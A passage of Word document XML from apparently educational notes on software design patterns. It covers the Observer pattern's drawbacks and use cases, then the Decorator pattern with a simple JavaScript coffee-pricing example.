        <w:t>: Observers can subscribe or unsubscribe at runtime, allowing for dynamic changes in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EA02F" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disadvantages of the Observer Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C41552" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memory Leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If observers are not properly unsubscribed, they may continue to exist in memory, leading to memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0172DA5D" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unexpected Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Changes in the subject may trigger updates in many observers, leading to potential performance issues or unintended side effects if not carefully managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2FC0A8" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="511"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity in Multithreaded Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In a multithreaded environment, ensuring that observers receive updates in a thread-safe manner can be challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FEC093" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Common Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602EC10C" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Handling Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: UI components like buttons and text fields that notify listeners when an event occurs (e.g., click, keypress).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0D255" w14:textId="77777777" w:rsidR="00CA2502" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Distributed Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Systems that need to broadcast updates across multiple clients or services, like chat applications or stock tickers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CADE4B" w14:textId="649D552A" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00CA2502" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MVC Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In Model-View-Controller (MVC) architecture, the Observer pattern is used to update views when the model’s state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40ED46" w14:textId="1B4A8781" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc178383335"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the Decorator pattern</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w14:paraId="7013929B" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decorator pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a structural design pattern that allows behavior to be added to individual objects, either statically or dynamically, without affecting the behavior of other objects from the same class. The pattern is often used to adhere to the Single Responsibility Principle (SRP) by allowing functionalities to be divided among classes with unique areas of concern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC2617" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of the Decorator Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E1BD8" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Component Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This is the common interface for both the concrete component and the decorators. It defines methods that can be altered by the decorators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FEFEFF" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The original object to which new behavior will be added. It implements the component interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8921BA" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decorator</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: An abstract class that implements the component interface and has a reference to a component object. It can add behavior either before or after delegating the call to the wrapped object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DFB30A" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="513"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concrete Decorators</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: These classes extend the decorator class and modify the behavior of the component by overriding methods of the component interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E451A4" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Purpose of the Decorator Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CAD3C" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The Decorator pattern is useful when you want to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302EBA87" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Add responsibilities to objects dynamically and transparently, without affecting other objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB69DD2" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid subclassing to extend functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D12D6B" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="514"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Combine multiple behaviors by wrapping objects multiple times with different decorators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8618D" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853257A" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Imagine you have a basic Coffee class, and you want to extend its functionality to support various add-ons like milk, sugar, or vanilla. Instead of creating multiple subclasses for every possible combination, you can use the Decorator pattern to add these add-ons dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1AF90" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Basic Example in JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5602E040"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Component Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761CB05"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Coffee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB65B82"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cost() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E131CA"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throw new Error("Method 'cost()' must be implemented.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053FE8A1"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FCC1E95"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54BE3FE0"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21A5570F"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Concrete Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F099664"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SimpleCoffee extends Coffee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB6029"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cost() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404B29A"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5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33449025"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685A98E1"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76A7EDD7"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235C45D9"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Decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F0494F"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CoffeeDecorator extends Coffee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E392D60"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constructor(coffee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428E6EE7"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super();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D416224"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this.decoratedCoffee = coffee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005EF133"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557D737"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25E840D6"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cost() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C0A29"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this.decoratedCoffee.cost();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEEBE7C"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540E4AA0"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4351C314"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32B59FC5"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Concrete Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF29AC"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MilkDecorator extends CoffeeDecorator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE94E8"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cost() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609377FF"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super.cost() + 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F6B2C"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16F424A"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744ED969"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0FF78AC2"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SugarDecorator extends CoffeeDecorator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2692E076"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cost() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9DA3E"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super.cost() + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F67262"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308F0F2A"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7B4597DE"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37E02925"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class VanillaDecorator extends CoffeeDecorator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D972FE8"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cost() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15AB5A"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return super.cost() + 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065B6DE5"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7C93A7A1"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4792C998"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654C9AAB"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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D672C7"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let myCoffee = new SimpleCoffee();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFE2246"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console.log("Cost of Simple Coffee:", myCoffee.cost());  // Output: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F759312"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6C9809DB"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myCoffee = new MilkDecorator(myCoffee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBEFB1D"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console.log("Cost of Coffee with Milk:", myCoffee.cost());  // Output: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB45861"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2DAF8111"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myCoffee = new SugarDecorator(myCoffee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F73E85"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console.log("Cost of Coffee with Milk and Sugar:", myCoffee.cost());  // Output: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682649E2"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p>
    <w:p w14:paraId="1FED4D94"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myCoffee = new VanillaDecorator(myCoffee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5DE83" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">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console.log("Cost of Coffee with Milk, Sugar, and Vanilla:", myCoffee.cost());  // Output: 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF626D3" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303C4166" w14:textId="77777777" w:rsidR="00566E3B" w:rsidRPr="00DA2F32" w:rsidRDefault="00566E3B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
